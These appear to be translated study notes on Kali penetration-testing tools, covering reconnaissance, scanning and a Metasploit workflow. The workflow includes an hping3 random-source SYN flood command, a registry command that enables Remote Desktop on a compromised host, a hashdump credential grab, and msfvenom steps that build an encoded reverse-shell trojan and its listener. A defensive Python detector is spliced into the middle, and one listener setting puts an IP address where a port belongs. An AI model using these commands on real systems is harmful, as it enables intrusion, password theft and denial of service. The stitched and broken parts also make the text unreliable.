Kali common analysis tool notes

bettercap: ARP spoofing


DNS investigation

dnsmap: brute-force subdomain guessing

dmitry -wiens -o search.txt baidu.com: an integrated tool for DNS, domain information and subdomain collection

recon-ng: brute-forces DNS subdomains; this function works well, and is best combined with the Shodan interface


IPS / IDS identification (intrusion prevention / detection systems)

fragroute www.baidu.com, then open a browser and visit the site; the traffic passes through fragroute and the entries are recorded

lbd baidu.com: detects whether a site is load balanced; it can only detect nginx and has now basically fallen out of use

wafw00f www.baidu.com: WAF detection; does not seem very handy


Host enumeration

atk6-alive6 eth0 (the NIC): can only discover the IPv6 addresses of hosts on the same local network

The msf framework also has this function:

set rhosts ipv6 address

use auxiliary/scanner/discovery/ipv6_multicast_ping

show options

run

Useful tool recommended by the teacher: hping3

hping3 --icmp -c 2 192.168.1.7: routine host-liveness test on the network

hping3 -S --flood --rand-source -p 80 192.168.1.7: flooding attack (SYN flood with randomised source addresses)

hping3 -1 <ip>: -1 is ICMP mode, the same as --icmp

nmap 192.168.1.0/24: liveness scan of the same subnet
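As an added defensive example (not part of the original notes), the following Python detector flags the bare-SYN, many-distinct-sources pattern that the hping3 -S --flood --rand-source command above produces on the wire. It runs over constructed tcpdump-style lines; the thresholds and the sample traffic are assumptions for illustration.

```python
"""Flag one-second buckets with many bare SYNs from many distinct sources
(the signature of a randomised-source SYN flood). Sample lines are constructed."""
import re
from collections import defaultdict

# tcpdump -nn style: "12:00:01.000123 IP 10.9.8.7.40000 > 192.168.1.7.80: Flags [S], ..."
LINE_RE = re.compile(
    r"^(?P<h>\d\d):(?P<m>\d\d):(?P<s>\d\d)\.\d+ IP (?P<src>[\d.]+)\.\d+ > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): Flags \[(?P<flags>[^\]]*)\]"
)

def parse_line(line):
    """Return (second_of_day, src, dst, dport, flags) or None for non-matching lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    sec = int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"])
    return sec, m["src"], m["dst"], int(m["dport"]), m["flags"]

def syn_flood_alerts(lines, syn_threshold=20, min_distinct_sources=10):
    """Return (dst, dport, second, syn_count, distinct_sources) for every one-second
    bucket exceeding both thresholds. A legitimate burst comes from a few clients;
    a --rand-source flood shows a different source on almost every packet."""
    buckets = defaultdict(lambda: [0, set()])
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        sec, src, dst, dport, flags = parsed
        if flags != "S":          # bare SYN only: SYN-ACK and ACK are normal handshake traffic
            continue
        buckets[(dst, dport, sec)][0] += 1
        buckets[(dst, dport, sec)][1].add(src)
    alerts = []
    for (dst, dport, sec), (count, srcs) in sorted(buckets.items()):
        if count >= syn_threshold and len(srcs) >= min_distinct_sources:
            alerts.append((dst, dport, sec, count, len(srcs)))
    return alerts

# Constructed sample: 25 bare SYNs from 25 different sources within one second,
# followed by one normal three-way handshake from a real client.
SAMPLE = [f"12:00:01.{i:06d} IP 10.{i}.{i}.{i}.4{i:04d} > 192.168.1.7.80: Flags [S], seq 1, win 512, length 0"
          for i in range(25)]
SAMPLE += [
    "12:00:02.000001 IP 192.168.1.20.51000 > 192.168.1.7.80: Flags [S], seq 1, win 64240, length 0",
    "12:00:02.000500 IP 192.168.1.7.80 > 192.168.1.20.51000: Flags [S.], seq 2, ack 2, win 65160, length 0",
    "12:00:02.000900 IP 192.168.1.20.51000 > 192.168.1.7.80: Flags [.], ack 1, win 502, length 0",
]

if __name__ == "__main__":
    for a in syn_flood_alerts(SAMPLE):
        print("possible SYN flood: dst=%s port=%d t=%d: %d SYNs from %d sources" % a)
```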


Ports, servers, services scan (nmap)


Fingerprint recognition

System identification

nmap -O 192.168.0.1 (OS detection)

xprobe2 www.freebuf.com -p tcp:80:open

whatweb www.freebuf.com

masscan: large-scale, high-speed scanning; targets are randomised across hosts, which makes it better for this

masscan 192.168.1.0/24 -p 80 --banners

Integrated tool: sparta. A GUI tool; add an IP (or range) and it works very well

Vulnerability scanning and exploitation framework: openvas

Web application attack and audit framework: w3af

w3af: installation is not very friendly and it runs a bit laggy; not much use for now

msf workflow

Important post-exploitation command: enable port 3389 (Remote Desktop) by adding a registry value: REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Read the password: search hashdump, use one of the modules, show options, set session, run to obtain the password

Remote Desktop connection: rdesktop 192.168.0.1:3389

Trojan generation:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=<own ip> LPORT=4444 -f exe > /root/xiee.exe

Before handing it to the target host, test whether it will call back (go online)

Then open the listener module on the attacking machine: msf5 > use exploit/multi/handler

Set the payload: set payload windows/meterpreter/reverse_tcp (the same one used to generate the Trojan)
Set your own listening port: set lport 192.168.188.255
Start it: run

Armitage


The msf interface is laggy and can sometimes be slow


Source: www.cnblogs.com/Qiuzhiyu/p/12562425.html